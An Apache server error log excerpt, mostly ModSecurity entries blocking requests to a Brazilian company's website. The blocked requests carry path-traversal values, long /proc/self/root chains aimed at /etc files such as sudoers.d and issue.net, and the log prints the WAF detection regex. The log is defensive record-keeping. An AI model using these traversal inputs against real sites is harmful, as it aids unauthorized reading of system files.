[Tue Mar 17 17:42:03.129799 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:42:03.946132 2026] [:error] [pid 2598:tid 140411624429312] [client 216.73.216.191:27917] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8mxj0p0SRWAqcjGGPVQAAAw4"]
[Tue Mar 17 17:42:10.370723 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:51250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8ohj0p0SRWAqcjGGPWAAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:12.299094 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:48510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8pPPqhzTj3BvfDX-crwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:13.019215 2026] [mime_magic:error] [pid 31803:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:34200] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firewalld
[Tue Mar 17 17:42:13.019643 2026] [access_compat:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:34200] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firewalld
[Tue Mar 17 17:42:13.622288 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:48514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8pda6ubjKNq_cu4Yc8wAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:15.123260 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:48518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8p6BJNF7axNlVR0Ut0wAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:25.125795 2026] [proxy_fcgi:error] [pid 29151:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46726] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:42:26.527488 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:52376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8stY0UrI5A3LftIwSsQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:27.954412 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:34482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8sxj0p0SRWAqcjGGPWgAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:29.373630 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.31:34492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8taBJNF7axNlVR0Ut1gAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:29.843957 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:41758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8tdY0UrI5A3LftIwStwAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:42:30.702680 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:34504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8ttY0UrI5A3LftIwSuQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:32.113900 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:34514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8uBj0p0SRWAqcjGGPWwAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:32.117502 2026] [mime_magic:error] [pid 2598:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:34514] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:33.594752 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.31:34518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8uQeiSKl8TjouI-Ys9wAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:34.036565 2026] [:error] [pid 2598:tid 140411641214720] [client 216.73.216.191:61373] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8uhj0p0SRWAqcjGGPXgAAAww"]
[Tue Mar 17 17:42:35.959109 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:34520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8uweiSKl8TjouI-Ys-QAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:37.825809 2026] [:error] [pid 25836:tid 140411557287680] [client 216.73.216.191:29753] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8vYh-PF_25v4hFRB_2QAAARY"]
[Tue Mar 17 17:42:38.750214 2026] [:error] [pid 2598:tid 140411565680384] [client 216.73.216.191:37305] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8vhj0p0SRWAqcjGGPYQAAAxU"]
[Tue Mar 17 17:42:39.464113 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.241.31:60060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8vweiSKl8TjouI-Ys-wAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:47.165798 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:42:51.396939 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:60016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8y9Y0UrI5A3LftIwSvQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:51.693211 2026] [:error] [pid 29151:tid 140411716749056] [client 216.73.216.191:5456] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8y_PqhzTj3BvfDX-ctwAAAcM"]
[Tue Mar 17 17:42:54.175483 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:60032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8zgeiSKl8TjouI-YtAQAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:55.301262 2026] [:error] [pid 7004:tid 140411565680384] [client 216.73.216.191:19177] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8z8U6Sx0TG1YjmQjDxgAAApU"]
[Tue Mar 17 17:42:56.963211 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.31:60044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 